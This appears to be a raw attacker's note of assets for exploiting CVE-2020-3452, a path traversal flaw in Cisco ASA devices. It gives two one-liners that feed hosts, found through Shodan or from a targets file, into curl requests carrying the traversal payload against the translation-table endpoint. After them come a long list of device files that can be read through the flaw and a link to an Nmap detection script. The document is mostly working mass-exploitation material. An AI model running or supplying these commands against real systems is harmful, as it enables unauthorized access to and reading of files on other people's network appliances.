assets for cve 2020-3452

Assets -

Hunting Using Shodan - 
shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl 
-s -k "https://$host/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" ; done

Hunting Using Subdomain Enumeration - 

cat targets.json | awk '{print $1}' | while read host do ; do curl -s -k  "https://$host/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"; done

Entry Points - 

File Entry Points 


logo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen

----------------------------
customization
bookmarks
locale
+CSCOT+
+CSCOCA+
+CSCOL+
admin
+CSCOU+
+CSCOE+
sessions

Nmap NSE Script to test :- https://github.com/Gh0st0ne/http-vuln-cve2020-3452.nse/blob/master/nmap.nse